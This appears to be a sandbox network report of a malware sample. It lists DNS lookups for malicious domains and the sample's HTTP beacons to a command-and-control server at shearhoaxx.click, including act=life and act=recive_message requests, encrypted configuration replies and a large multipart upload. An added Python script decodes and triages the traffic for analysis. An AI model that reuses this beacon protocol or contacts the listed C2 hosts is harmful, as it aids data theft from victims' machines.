Dec 23, 2024 10:35:28.344888926 CET | 57882 | 53 | 192.168.2.16 | 1.1.1.1
Dec 23, 2024 10:35:28.672821999 CET | 53 | 57882 | 1.1.1.1 | 192.168.2.16
Dec 23, 2024 10:35:44.214869022 CET | 51485 | 53 | 192.168.2.16 | 1.1.1.1
Dec 23, 2024 10:35:44.361274958 CET | 53 | 51485 | 1.1.1.1 | 192.168.2.16
Dec 23, 2024 10:35:48.492522955 CET | 61275 | 53 | 192.168.2.16 | 1.1.1.1
Dec 23, 2024 10:35:48.795543909 CET | 53 | 61275 | 1.1.1.1 | 192.168.2.16
Dec 23, 2024 10:35:50.646886110 CET | 60923 | 53 | 192.168.2.16 | 1.1.1.1
Dec 23, 2024 10:35:51.284506083 CET | 53 | 60923 | 1.1.1.1 | 192.168.2.16
Dec 23, 2024 10:35:52.106946945 CET | 58093 | 53 | 192.168.2.16 | 1.1.1.1
Dec 23, 2024 10:35:52.426035881 CET | 53 | 58093 | 1.1.1.1 | 192.168.2.16
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 10:35:10.042277098 CET | 192.168.2.16 | 1.1.1.1 | 0xb4bd | Standard query (0) | cGJmezVyRdXbTgHBdDquAsIHIVjMv.cGJmezVyRdXbTgHBdDquAsIHIVjMv | A (IP address) | IN (0x0001) | false
Dec 23, 2024 10:35:28.344888926 CET | 192.168.2.16 | 1.1.1.1 | 0xb1d3 | Standard query (0) | shearhoaxx.click | A (IP address) | IN (0x0001) | false
Dec 23, 2024 10:35:44.214869022 CET | 192.168.2.16 | 1.1.1.1 | 0xf6ff | Standard query (0) | cGJmezVyRdXbTgHBdDquAsIHIVjMv.cGJmezVyRdXbTgHBdDquAsIHIVjMv | A (IP address) | IN (0x0001) | false
Dec 23, 2024 10:35:48.492522955 CET | 192.168.2.16 | 1.1.1.1 | 0x95ff | Standard query (0) | kliplorihoe0.shop | A (IP address) | IN (0x0001) | false
Dec 23, 2024 10:35:50.646886110 CET | 192.168.2.16 | 1.1.1.1 | 0x2f2b | Standard query (0) | slotwang.com | A (IP address) | IN (0x0001) | false
Dec 23, 2024 10:35:52.106946945 CET | 192.168.2.16 | 1.1.1.1 | 0x8d6b | Standard query (0) | kliptedehoa.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 10:35:10.277992010 CET | 1.1.1.1 | 192.168.2.16 | 0xb4bd | Name error (3) | cGJmezVyRdXbTgHBdDquAsIHIVjMv.cGJmezVyRdXbTgHBdDquAsIHIVjMv | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 10:35:28.672821999 CET | 1.1.1.1 | 192.168.2.16 | 0xb1d3 | No error (0) | shearhoaxx.click |  | 172.67.129.49 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 10:35:28.672821999 CET | 1.1.1.1 | 192.168.2.16 | 0xb1d3 | No error (0) | shearhoaxx.click |  | 104.21.1.114 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 10:35:44.361274958 CET | 1.1.1.1 | 192.168.2.16 | 0xf6ff | Name error (3) | cGJmezVyRdXbTgHBdDquAsIHIVjMv.cGJmezVyRdXbTgHBdDquAsIHIVjMv | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 10:35:48.795543909 CET | 1.1.1.1 | 192.168.2.16 | 0x95ff | No error (0) | kliplorihoe0.shop |  | 172.67.182.135 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 10:35:48.795543909 CET | 1.1.1.1 | 192.168.2.16 | 0x95ff | No error (0) | kliplorihoe0.shop |  | 104.21.43.169 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 10:35:51.284506083 CET | 1.1.1.1 | 192.168.2.16 | 0x2f2b | No error (0) | slotwang.com |  | 45.66.248.134 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 10:35:52.426035881 CET | 1.1.1.1 | 192.168.2.16 | 0x8d6b | No error (0) | kliptedehoa.shop |  | 104.21.35.89 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 10:35:52.426035881 CET | 1.1.1.1 | 192.168.2.16 | 0x8d6b | No error (0) | kliptedehoa.shop |  | 172.67.216.59 | A (IP address) | IN (0x0001) | false
• shearhoaxx.click
• kliplorihoe0.shop
• slotwang.com
• kliptedehoa.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.16 | 49701 | 172.67.129.49 | 443 | 6176 | C:\Users\user\AppData\Local\Temp\650429\Palestine.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 09:35:29 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: shearhoaxx.click
2024-12-23 09:35:29 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-23 09:35:30 UTC | 1119 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 09:35:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=6t21rh5pc2deh8omfnn7m914uu; expires=Fri, 18 Apr 2025 03:22:09 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rGD3y4Vh7zT71%2F3bo6EhCNG1jnxX9HXTxHnzjbOhHBAj0SicOhBRRO%2BE276adAPe9wAZO6ZndBIOHFU39MVwDntro7uAutqMwDIWu1bu83EOPMOoPG9pqXw7XFth8esABl41"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f675ca59bc5430d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1728&rtt_var=664&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=907&delivery_rate=1628555&cwnd=227&unsent_bytes=0&cid=8375f9a73042b486&ts=793&x=0"
2024-12-23 09:35:30 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-23 09:35:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
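The exchange above (a form-encoded POST to /api answered with a chunked "ok") and the act=recive_message request in the next session are the observable C2 shape in this report. The following script decodes the report's "Data Raw" hex back into bytes, reassembles the chunked reply, extracts the act, ver and lid fields, and checks that the Host header really resolved to the IP the socket connected to (the DNS answer table above maps shearhoaxx.click to 172.67.129.49). This is an added example, not code from the Joe Sandbox report or from the sample: the hex strings and DNS answers are copied from the report, while the table of known act values, the "lumma_like" verdict and all function names are the editor's assumptions drawn only from what this capture shows, not a description of the full protocol.

```python
"""Decode and triage the HTTP exchanges captured in the sandbox report.

Added example, not part of the Joe Sandbox report or of the sample. The hex
strings and DNS answers are copied from the report's tables; KNOWN_ACTS and
the 'lumma_like' verdict are the editor's assumptions drawn from this capture.
"""
from urllib.parse import parse_qs

# Constructed from the report: the two POST bodies ("Data Raw" lines) and the
# two reply chunks of session 0 ("2\r\nok\r\n" followed by the "0\r\n\r\n" terminator).
REQUEST_HEX = {
    0: "61 63 74 3d 6c 69 66 65",
    1: "61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 "
       "26 6c 69 64 3d 44 76 68 38 75 69 2d 2d 38 38 38 26 6a 3d",
}
RESPONSE_CHUNKS_HEX = ["32 0d 0a 6f 6b 0d 0a", "30 0d 0a 0d 0a"]

# Constructed from the report's DNS answer table: name -> A records returned by 1.1.1.1.
DNS_ANSWERS = {
    "shearhoaxx.click": {"172.67.129.49", "104.21.1.114"},
    "kliplorihoe0.shop": {"172.67.182.135", "104.21.43.169"},
    "slotwang.com": {"45.66.248.134"},
    "kliptedehoa.shop": {"104.21.35.89", "172.67.216.59"},
}

# Assumption: the only 'act' values this report shows, with what the capture says they do.
KNOWN_ACTS = {
    "life": "check-in; server replies 'ok'",
    "recive_message": "configuration / task request keyed by lid",
}


def decode_raw(hex_line: str) -> bytes:
    """Turn a report 'Data Raw' line ("61 63 74 ...") back into bytes."""
    return bytes.fromhex(hex_line.replace(" ", ""))


def first_chunk_size(body: bytes) -> int:
    """Declared size of the first chunk; useful when the report truncates the chunk data."""
    size_line = body.split(b"\r\n", 1)[0]
    return int(size_line.split(b";")[0], 16)  # drop any chunk extension after ';'


def dechunk(body: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body; stops cleanly on a truncated capture."""
    out = bytearray()
    pos = 0
    while True:
        end = body.find(b"\r\n", pos)
        if end < 0:                       # no complete size line left
            break
        size = int(body[pos:end].split(b";")[0], 16)
        if size == 0:                     # last-chunk marker
            break
        start = end + 2
        out += body[start:start + size]   # a short slice just means the capture was cut
        pos = start + size + 2            # skip the data and its trailing CRLF
    return bytes(out)


def classify_post(body: bytes) -> dict:
    """Parse an application/x-www-form-urlencoded body and flag the beacon shape."""
    fields = parse_qs(body.decode("latin-1"), keep_blank_values=True)
    act = fields.get("act", [""])[0]
    return {
        "act": act,
        "ver": fields.get("ver", [None])[0],
        "lid": fields.get("lid", [None])[0],
        "lumma_like": act in KNOWN_ACTS,
        "note": KNOWN_ACTS.get(act),
    }


def host_matches_dns(host: str, dest_ip: str) -> bool:
    """True when the Host header's name resolved, in this capture, to the socket's destination."""
    return dest_ip in DNS_ANSWERS.get(host.lower(), set())


def triage_session(request_hex: str, host: str, dest_ip: str, response_chunks_hex=()) -> dict:
    """Combine the checks for one session the way the report lays it out."""
    verdict = classify_post(decode_raw(request_hex))
    verdict["host"] = host
    verdict["dns_consistent"] = host_matches_dns(host, dest_ip)
    if response_chunks_hex:
        verdict["response"] = dechunk(b"".join(decode_raw(h) for h in response_chunks_hex))
    return verdict


if __name__ == "__main__":
    # Session 0 from the report: check-in to shearhoaxx.click (172.67.129.49:443).
    print(triage_session(REQUEST_HEX[0], "shearhoaxx.click", "172.67.129.49", RESPONSE_CHUNKS_HEX))
    # Session 1: the config request; the report shows only the start of its chunked reply.
    print(triage_session(REQUEST_HEX[1], "shearhoaxx.click", "172.67.129.49"))
    # First reply chunk of session 1 declares its length as 0x491c bytes.
    print(first_chunk_size(decode_raw("34 39 31 63 0d 0a")))
```

The chunk-size helper matters because the report cuts the second session's reply after 244 and 1369 bytes: the leading "491c" tells you how much encrypted configuration the server actually sent, so you know the capture is partial before trying to decode it.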


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.16 | 49702 | 172.67.129.49 | 443 | 6176 | C:\Users\user\AppData\Local\Temp\650429\Palestine.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 09:35:31 UTC | 264 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 45
Host: shearhoaxx.click
2024-12-23 09:35:31 UTC | 45 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 44 76 68 38 75 69 2d 2d 38 38 38 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=Dvh8ui--888&j=
2024-12-23 09:35:32 UTC | 1125 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 09:35:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=hc3rglngaf9kua64ql75v5ugup; expires=Fri, 18 Apr 2025 03:22:11 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9uA%2BxZ8wQfQB9NBzmBQejWXdP1d1pC0qqkAEcfrNLBN2QesUcYvhsWGa51DurIwpgUx%2FQtUX%2FpDdkayhm%2FjmcJuQKWkE1kr39YOWEUURmJBjCHQ8gvTr6kY%2BLC67SaB0ukcR"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f675cb22eae425d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1739&min_rtt=1735&rtt_var=658&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=945&delivery_rate=1652518&cwnd=193&unsent_bytes=0&cid=b51c6f9d3623ea50&ts=773&x=0"
2024-12-23 09:35:32 UTC | 244 | IN | Data Raw: 34 39 31 63 0d 0a 59 6f 4f 67 4c 41 74 6f 70 51 68 4b 63 46 47 55 51 37 78 6d 36 33 6f 6a 54 4c 5a 49 48 68 6a 70 68 71 33 61 2f 71 73 6b 4e 6a 30 5a 6f 64 59 4f 4d 56 79 4a 4b 6a 6b 56 63 36 34 33 7a 68 4f 4f 56 67 45 74 30 6d 6f 6b 66 6f 6a 71 33 72 2f 53 69 56 4a 62 48 31 6a 6c 77 55 42 34 44 59 6b 71 4c 77 68 7a 72 68 6a 48 52 49 34 55 41 58 61 55 4c 58 52 36 69 4f 72 50 75 35 58 45 56 46 70 65 43 75 2f 48 52 47 34 4c 77 57 6b 6d 48 54 54 78 4a 74 30 4d 68 52 4e 4f 4a 4e 74 71 4d 6a 71 4d 2f 49 2f 67 33 4f 5a 42 51 6c 77 76 34 74 4e 48 4b 52 57 4a 63 32 67 56 50 37 5a 35 6e 67 65 4f 47 45 38 71 30 69 4e 32 63 49 48 69 7a 72 36 55 32 30 31 51 56 51 72 68 78 45 56 6b 41 74 56 6b 4c 42 6f 2f 39 79 7a 64 52 4d 64 59 52 6a
Data Ascii: 491cYoOgLAtopQhKcFGUQ7xm63ojTLZIHhjphq3a/qskNj0ZodYOMVyJKjkVc643zhOOVgEt0mokfojq3r/SiVJbH1jlwUB4DYkqLwhzrhjHRI4UAXaULXR6iOrPu5XEVFpeCu/HRG4LwWkmHTTxJt0MhRNOJNtqMjqM/I/g3OZBQlwv4tNHKRWJc2gVP7Z5ngeOGE8q0iN2cIHizr6U201QVQrhxEVkAtVkLBo/9yzdRMdYRj
2024-12-23 09:35:32 UTC | 1369 | IN | Data Raw: 61 55 63 6a 77 70 75 65 66 65 71 59 6e 45 56 6c 49 66 48 36 2f 62 44 6d 34 47 68 7a 4a 6f 47 6a 2f 34 4a 4e 30 4c 6a 68 6c 42 50 4e 73 71 66 33 4b 44 34 4d 57 33 6b 38 5a 49 58 6c 67 49 36 4d 56 42 62 67 4c 42 5a 53 74 53 66 62 59 6d 78 6b 54 52 57 47 45 2b 31 79 6c 6f 64 35 71 6b 30 50 61 46 69 55 46 59 48 31 69 68 78 45 42 6f 42 38 64 34 49 42 6b 34 38 7a 50 56 44 59 51 56 51 53 50 65 4a 58 39 36 6a 4f 37 46 74 35 62 4e 53 31 6c 5a 41 4f 47 43 41 43 6b 4e 33 79 70 77 55 68 44 7a 4d 64 6b 49 6e 31 70 37 62 73 74 6b 5a 54 71 4d 36 49 2f 67 33 4d 46 44 56 31 77 4c 37 73 46 47 59 68 6a 48 65 43 34 66 4e 75 51 6e 32 77 71 44 47 31 4d 6b 32 69 78 2f 63 34 44 74 79 72 2b 59 69 51 67 55 57 42 69 68 6d 67 35 49 42 38 78 6d 49 67 55 7a 74 6a 36 51 48 63 6b 66 54
Data Ascii: aUcjwpuefeqYnEVlIfH6/bDm4GhzJoGj/4JN0LjhlBPNsqf3KD4MW3k8ZIXlgI6MVBbgLBZStSfbYmxkTRWGE+1ylod5qk0PaFiUFYH1ihxEBoB8d4IBk48zPVDYQVQSPeJX96jO7Ft5bNS1lZAOGCACkN3ypwUhDzMdkIn1p7bstkZTqM6I/g3MFDV1wL7sFGYhjHeC4fNuQn2wqDG1Mk2ix/c4Dtyr+YiQgUWBihmg5IB8xmIgUztj6QHckfT
                                                                                                                                                                                                                                            2024-12-23 09:35:32 UTC1369INData Raw: 7a 64 34 65 6b 67 66 69 62 30 51 59 4d 48 79 72 69 31 6b 31 6a 53 50 4a 70 4a 68 77 30 34 47 48 42 53 70 42 59 52 69 4b 55 63 6a 78 33 69 75 7a 4a 71 70 50 45 52 56 70 52 44 2b 54 4e 52 6d 6b 4b 79 6d 38 73 47 54 6a 31 4c 4e 6f 57 67 78 68 4a 4b 39 55 67 64 6a 72 46 70 4d 69 67 33 4a 45 47 5a 55 67 4c 6f 2f 64 4e 5a 77 54 41 66 47 67 4e 66 65 39 68 32 51 6a 4a 51 41 45 6a 33 43 39 35 64 59 72 75 77 62 32 57 78 55 35 61 58 42 4c 75 78 6b 35 6c 41 73 31 6e 4a 68 59 37 2f 79 72 56 41 6f 6b 5a 53 32 36 61 61 6e 74 69 79 37 79 50 6a 4a 76 46 53 31 73 64 4e 65 4c 4d 51 47 34 63 68 33 56 6d 43 33 50 78 4c 5a 35 63 79 52 52 49 4c 74 38 67 65 48 71 4d 36 63 71 37 6d 38 70 4c 55 31 55 4f 35 73 5a 43 59 41 66 42 61 69 38 57 4e 75 51 6b 31 77 69 46 57 41 39 75 30 7a
                                                                                                                                                                                                                                            Data Ascii: zd4ekgfib0QYMHyri1k1jSPJpJhw04GHBSpBYRiKUcjx3iuzJqpPERVpRD+TNRmkKym8sGTj1LNoWgxhJK9UgdjrFpMig3JEGZUgLo/dNZwTAfGgNfe9h2QjJQAEj3C95dYruwb2WxU5aXBLuxk5lAs1nJhY7/yrVAokZS26aantiy7yPjJvFS1sdNeLMQG4ch3VmC3PxLZ5cyRRILt8geHqM6cq7m8pLU1UO5sZCYAfBai8WNuQk1wiFWA9u0z
                                                                                                                                                                                                                                            2024-12-23 09:35:32 UTC1369INData Raw: 70 4d 69 30 33 4a 45 47 58 56 59 53 37 38 78 48 5a 41 7a 50 62 53 59 66 4f 50 41 71 32 51 4f 50 46 55 6b 6a 30 53 6c 39 66 6f 48 32 7a 4c 4f 57 78 45 77 55 45 55 44 6d 32 67 34 78 53 75 42 6d 41 51 49 6f 35 44 65 65 47 38 63 42 41 53 6e 59 61 69 51 36 69 4f 76 47 74 35 54 42 53 56 74 62 44 75 66 45 51 32 77 46 7a 58 67 67 48 44 37 39 4c 74 55 57 69 52 56 46 49 74 41 69 64 33 44 4c 71 6f 2b 2f 68 49 6b 65 46 47 6f 4e 37 73 4a 4e 66 30 72 59 4a 44 46 53 4e 50 70 68 68 6b 53 46 46 6b 45 68 32 43 5a 33 63 6f 72 6f 77 62 2b 5a 77 45 35 63 54 51 48 6c 79 6b 39 6e 42 63 5a 75 4c 52 63 33 38 53 58 59 43 38 6c 57 41 53 6e 4d 61 69 51 36 70 4d 50 36 2b 72 33 7a 42 6b 73 52 47 61 48 46 51 69 6c 53 68 32 59 72 48 6a 76 35 4a 39 63 49 67 78 46 4b 49 74 38 75 63 48 4f
                                                                                                                                                                                                                                            Data Ascii: pMi03JEGXVYS78xHZAzPbSYfOPAq2QOPFUkj0Sl9foH2zLOWxEwUEUDm2g4xSuBmAQIo5DeeG8cBASnYaiQ6iOvGt5TBSVtbDufEQ2wFzXggHD79LtUWiRVFItAid3DLqo+/hIkeFGoN7sJNf0rYJDFSNPphhkSFFkEh2CZ3corowb+ZwE5cTQHlyk9nBcZuLRc38SXYC8lWASnMaiQ6pMP6+r3zBksRGaHFQilSh2YrHjv5J9cIgxFKIt8ucHO
                                                                                                                                                                                                                                            2024-12-23 09:35:32 UTC1369INData Raw: 5a 33 50 56 46 4e 57 45 75 2f 50 51 57 45 43 7a 6d 73 73 46 7a 37 77 4c 64 51 46 6a 68 5a 50 4a 70 52 6b 50 48 32 54 70 4a 66 34 76 64 6c 64 52 6b 6b 4e 77 4d 39 42 4b 52 57 4a 63 32 67 56 50 37 5a 35 6e 67 32 62 48 45 77 38 33 53 31 79 64 59 6a 32 7a 72 57 58 32 30 46 62 57 77 66 74 78 45 46 76 43 38 4a 67 4a 42 55 32 2f 53 37 53 52 4d 64 59 52 6a 61 55 63 6a 78 55 67 50 66 59 75 35 4c 43 55 45 38 66 48 36 2f 62 44 6d 34 47 68 7a 4a 6f 45 54 6a 39 4a 64 34 49 69 52 78 4d 4c 73 59 6c 65 33 32 43 37 39 32 79 6d 38 35 4e 58 46 51 50 35 39 42 43 5a 78 6a 43 65 44 70 53 66 62 59 6d 78 6b 54 52 57 48 63 70 78 44 70 2f 4f 4c 72 79 7a 4b 36 58 78 45 6f 55 51 45 37 34 67 6b 6c 6c 53 70 38 71 4c 68 30 36 39 53 37 66 44 59 55 56 52 43 66 52 4b 33 70 2b 67 65 37 50
                                                                                                                                                                                                                                            Data Ascii: Z3PVFNWEu/PQWECzmssFz7wLdQFjhZPJpRkPH2TpJf4vdldRkkNwM9BKRWJc2gVP7Z5ng2bHEw83S1ydYj2zrWX20FbWwftxEFvC8JgJBU2/S7SRMdYRjaUcjxUgPfYu5LCUE8fH6/bDm4GhzJoETj9Jd4IiRxMLsYle32C792ym85NXFQP59BCZxjCeDpSfbYmxkTRWHcpxDp/OLryzK6XxEoUQE74gkllSp8qLh069S7fDYUVRCfRK3p+ge7P
                                                                                                                                                                                                                                            2024-12-23 09:35:32 UTC1369INData Raw: 6b 61 52 6b 44 6d 7a 67 34 78 53 73 52 74 4b 78 4d 35 2f 79 33 52 41 34 30 4b 53 79 6e 47 4b 33 31 78 68 75 6a 50 74 5a 48 44 52 31 31 53 44 4f 7a 46 53 57 59 50 68 79 52 6f 46 53 75 32 65 5a 34 6c 68 42 4e 4e 64 59 35 71 59 7a 53 53 70 4d 69 30 33 4a 45 47 56 46 55 46 36 38 39 4e 5a 67 6e 56 61 79 34 41 4d 2f 73 72 7a 41 36 43 48 55 77 6a 32 53 6c 36 66 49 44 6f 33 62 47 63 79 6b 30 55 45 55 44 6d 32 67 34 78 53 75 52 39 50 68 67 30 2b 6a 66 56 42 59 6f 4f 54 44 36 55 5a 44 78 72 6a 50 57 50 34 49 72 5a 55 56 4e 41 54 76 69 43 53 57 56 4b 6e 79 6f 75 47 7a 58 78 4a 39 41 57 6a 42 35 4f 49 64 30 6a 65 48 4b 49 35 4d 75 38 6d 38 78 46 57 46 51 48 34 73 31 4b 59 41 54 4f 5a 57 68 63 63 2f 45 35 6e 6c 7a 4a 4f 56 6f 74 32 43 63 38 5a 63 58 39 6a 37 2b 51 69
                                                                                                                                                                                                                                            Data Ascii: kaRkDmzg4xSsRtKxM5/y3RA40KSynGK31xhujPtZHDR11SDOzFSWYPhyRoFSu2eZ4lhBNNdY5qYzSSpMi03JEGVFUF689NZgnVay4AM/srzA6CHUwj2Sl6fIDo3bGcyk0UEUDm2g4xSuR9Phg0+jfVBYoOTD6UZDxrjPWP4IrZUVNATviCSWVKnyouGzXxJ9AWjB5OId0jeHKI5Mu8m8xFWFQH4s1KYATOZWhcc/E5nlzJOVot2Cc8ZcX9j7+Qi
                                                                                                                                                                                                                                            2024-12-23 09:35:32 UTC1369INData Raw: 59 6f 65 4a 46 66 77 2f 41 66 47 6f 6e 4d 50 67 76 32 52 4c 4a 42 33 35 67 6c 43 56 6d 4f 74 50 64 31 76 69 62 78 51 59 4d 48 78 58 6d 77 6b 6c 7a 48 4d 42 6d 4f 52 6b 2b 2b 67 50 52 41 35 38 62 54 69 33 46 49 7a 42 78 68 71 53 42 2b 4a 76 52 42 67 77 66 4c 2b 62 55 54 55 59 4a 31 6d 4e 6f 58 48 50 78 4e 35 35 63 79 53 59 42 50 4e 63 36 66 33 57 61 32 6f 2f 67 68 66 63 47 58 30 6b 48 38 63 46 59 59 67 66 4c 65 78 5a 53 61 36 4a 7a 6a 46 62 62 53 6c 35 75 79 78 55 79 4f 6f 71 6b 6c 34 47 46 69 56 41 55 42 31 4b 76 67 6c 77 70 55 6f 63 74 4b 77 41 68 38 43 4c 49 42 38 34 6d 66 77 6e 43 49 48 74 71 6a 50 50 41 2b 4e 4b 4a 53 52 51 48 4f 61 48 4c 53 58 49 62 30 57 63 34 46 58 50 4a 62 35 34 63 79 55 41 42 47 39 63 6b 63 6e 32 64 39 59 4b 66 69 73 4e 42 52 46
                                                                                                                                                                                                                                            Data Ascii: YoeJFfw/AfGonMPgv2RLJB35glCVmOtPd1vibxQYMHxXmwklzHMBmORk++gPRA58bTi3FIzBxhqSB+JvRBgwfL+bUTUYJ1mNoXHPxN55cySYBPNc6f3Wa2o/ghfcGX0kH8cFYYgfLexZSa6JzjFbbSl5uyxUyOoqkl4GFiVAUB1KvglwpUoctKwAh8CLIB84mfwnCIHtqjPPA+NKJSRQHOaHLSXIb0Wc4FXPJb54cyUABG9ckcn2d9YKfisNBRF
                                                                                                                                                                                                                                            2024-12-23 09:35:32 UTC1369INData Raw: 51 53 55 45 7a 47 6f 76 41 69 58 74 62 64 59 48 6b 77 4a 2f 45 50 38 6d 65 6e 32 52 34 38 6d 65 76 49 6b 49 46 46 42 41 75 66 73 4f 49 55 72 34 4a 47 67 4b 63 36 35 68 36 77 65 48 46 6b 59 34 78 57 64 55 57 62 48 65 6a 5a 53 62 33 41 52 67 57 42 44 77 79 55 4e 6c 53 6f 6b 71 4c 6c 4a 72 70 6d 2b 65 41 4a 68 59 47 58 36 47 63 53 6b 70 33 4c 53 64 70 39 4c 51 42 6b 49 66 57 4c 4f 4d 44 6e 74 4b 6e 79 70 76 45 53 48 6b 4a 39 30 53 69 6c 39 2f 45 50 4d 6b 65 33 75 64 39 4e 69 33 6f 76 64 54 56 31 45 4f 35 74 52 66 4b 55 53 48 5a 57 68 4b 43 72 5a 70 6e 6a 76 48 57 46 6c 75 6a 47 70 4a 65 59 58 71 79 4b 36 4e 68 47 46 61 57 41 48 33 30 6c 6c 6d 53 6f 6b 71 4c 6c 4a 72 70 47 2b 65 41 4a 68 59 47 58 36 47 63 53 6b 70 33 4c 53 64 70 39 4c 51 42 6b 49 66 57 4c 4f
                                                                                                                                                                                                                                            Data Ascii: QSUEzGovAiXtbdYHkwJ/EP8men2R48mevIkIFFBAufsOIUr4JGgKc65h6weHFkY4xWdUWbHejZSb3ARgWBDwyUNlSokqLlJrpm+eAJhYGX6GcSkp3LSdp9LQBkIfWLOMDntKnypvESHkJ90Sil9/EPMke3ud9Ni3ovdTV1EO5tRfKUSHZWhKCrZpnjvHWFlujGpJeYXqyK6NhGFaWAH30llmSokqLlJrpG+eAJhYGX6GcSkp3LSdp9LQBkIfWLO
                                                                                                                                                                                                                                            2024-12-23 09:35:32 UTC1369INData Raw: 59 56 4b 4c 77 51 77 74 6d 2b 65 43 4d 6c 41 41 53 2f 65 4f 6e 46 31 6a 4b 6a 49 6f 70 75 4a 43 42 52 52 51 4c 6d 43 54 32 4d 61 79 6d 55 76 58 6a 58 34 4c 35 34 62 78 77 45 42 4f 4a 52 79 4c 7a 54 4c 39 6f 2f 67 33 49 35 46 52 6b 30 47 34 74 52 4e 4c 6a 54 35 52 7a 6f 56 49 2f 56 6a 37 77 6d 4e 44 6c 51 74 78 43 31 43 52 4b 62 32 79 4b 69 66 69 33 64 43 58 41 44 76 78 51 34 6e 53 74 38 71 63 46 49 65 35 43 62 4f 42 38 6c 57 41 53 4b 55 63 6a 78 33 6d 65 50 66 75 39 44 4f 58 46 4d 66 48 36 2f 62 44 6e 39 4b 6e 7a 6c 6d 55 69 47 32 65 5a 35 44 68 78 56 41 4c 64 6f 70 62 6d 69 4e 35 39 6d 37 32 2f 64 34 65 55 30 48 38 63 45 4d 57 41 66 44 66 44 30 52 49 2f 45 66 34 43 6d 62 48 31 45 74 6c 67 5a 37 64 34 66 61 38 59 2b 4e 7a 6c 59 57 65 51 50 33 77 51 34 6e
                                                                                                                                                                                                                                            Data Ascii: YVKLwQwtm+eCMlAAS/eOnF1jKjIopuJCBRRQLmCT2MaymUvXjX4L54bxwEBOJRyLzTL9o/g3I5FRk0G4tRNLjT5RzoVI/Vj7wmNDlQtxC1CRKb2yKifi3dCXADvxQ4nSt8qcFIe5CbOB8lWASKUcjx3mePfu9DOXFMfH6/bDn9KnzlmUiG2eZ5DhxVALdopbmiN59m72/d4eU0H8cEMWAfDfD0RI/Ef4CmbH1EtlgZ7d4fa8Y+NzlYWeQP3wQ4n


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.16 | 49703 | 172.67.129.49 | 443 | 6176 | C:\Users\user\AppData\Local\Temp\650429\Palestine.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 09:35:34 UTC | 278 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=0XCM0IN6W00VK5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12818
Host: shearhoaxx.click
